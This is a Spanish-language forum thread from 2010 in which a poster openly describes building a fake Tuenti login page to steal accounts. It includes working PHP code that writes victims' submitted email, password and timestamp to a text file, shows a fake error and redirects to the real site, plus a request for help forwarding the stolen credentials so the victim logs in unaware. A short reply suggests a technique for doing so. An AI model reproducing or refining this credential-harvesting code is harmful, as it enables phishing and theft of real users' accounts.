elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Reenviar datos de formulario php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Reenviar datos de formulario php  (Leído 2,842 veces)
iDrokerGeek_

Desconectado Desconectado

Mensajes: 55


Don't be Windows, Be Free


Ver Perfil
Reenviar datos de formulario php
« en: 30 Septiembre 2010, 22:04 pm »

Hola!
Para que entendais mejor mi situación, lo dire sin rodeos ni verguenza xD
Simplemente estoy haciendo un fake del portal de Tuenti para que guarde las cuentas en un .txt
Bueno, pues el caso es que lo estoy haciendo medio copiar medio creacion propia/adaptacion al nuevo portal porque el fake que encontre era antiguo/perfeccionamiento total de modo que no pida 2 veces la cuenta  >: D  (siii, cuando lo tenga perfecto, version beta, lo publico y lo vendo... bueno, vale, gratis xDD)
El caso es que ya tengo el portal (solo he guardado la pagina xD y modificado el destino del form)
y despues el php es el siguiente:


Código:
<?php
$id=$_POST['login'];
$pass=$_POST['passwd'];
$fecha=date("H:i:s - d D, m Y");
$FOOL=fopen('registro.txt',a);
fwrite($FOOL,"
Email: ".$id."
Pass: " .$pass."
".$fecha."
_________________ ");
fclose($FOOL);
echo "<script>alert(\"Tu usuario y/o contraseña son incorrectos. Por favor, vuelve a intentarlo\");</script>";
echo "<meta http-equiv='refresh' content='l;url=https://www.tuenti.com/?m=Login&amp;func=do_login'>";
?>

Bien, pues ahi veo que en el txt escribe la cuenta, la pass y la fecha, y una linea divisoria.
Ok, todo va como la seda. Ahora, el problema a vista de mi dichoso perfeccionismo esta despues de imprimir los datos, cuando toca redirigir.
Segun eso, el php te saca un mensaje de error (o de aviso, o un simple mensaje) diciendo que no es correcto, y a continuacion te redirije a la oficial de tuenti.
Bueno, empezando con que NO te redirije, sino que solo saca el mensaje, mi objetivo es que no saque ningun mensaje, sino que con los valores de $id y $pass, o los valores de login y passwd, los mande al oficial sin rechistar, y directamente loguearte alli, o sea, que enviase los datos.
Quizas sea bastante complejo que envie los datos al oficial, porque haya codigo raro de por medio que impide que se metan datos de paginas externas, o algo... No sé.
Alguna sugerencia?
Ah, por cierto, el php se llama google.php, y subo ambos archivos para que los descargueis y lo tortureis:
http://www.multiupload.com/18A108MZRQ

Saludos! Todo sea por el bien de la comunidad!


En línea

"Stay hungry, stay Foolish"
-Steve Jobs
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Reenviar datos de formulario php
« Respuesta #1 en: 30 Septiembre 2010, 22:10 pm »

HttpLoginConnect


En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda.. Reenviar Correo.
Dudas Generales
scambanck 1 2,775 Último mensaje 17 Julio 2011, 12:16 pm
por WaAYa HaCK
reenviar correo
Dudas Generales
brunodhernandez 1 1,631 Último mensaje 23 Octubre 2012, 02:06 am
por 177600531
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines